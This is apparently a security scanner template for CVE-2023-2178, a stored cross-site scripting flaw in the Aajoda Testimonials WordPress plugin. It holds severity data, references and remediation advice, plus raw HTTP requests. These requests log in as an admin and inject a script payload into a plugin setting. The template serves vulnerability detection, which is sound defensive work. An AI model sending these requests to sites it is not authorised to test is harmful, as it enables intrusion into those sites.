id: CVE-2023-2178 info: name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting author: Farish severity: medium description: | The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip - https://nvd.nist.gov/vuln/detail/CVE-2023-2178 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 epss-percentile: 0.3232 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: aajoda product: aajoda_testimonials framework: wordpress tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and # digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950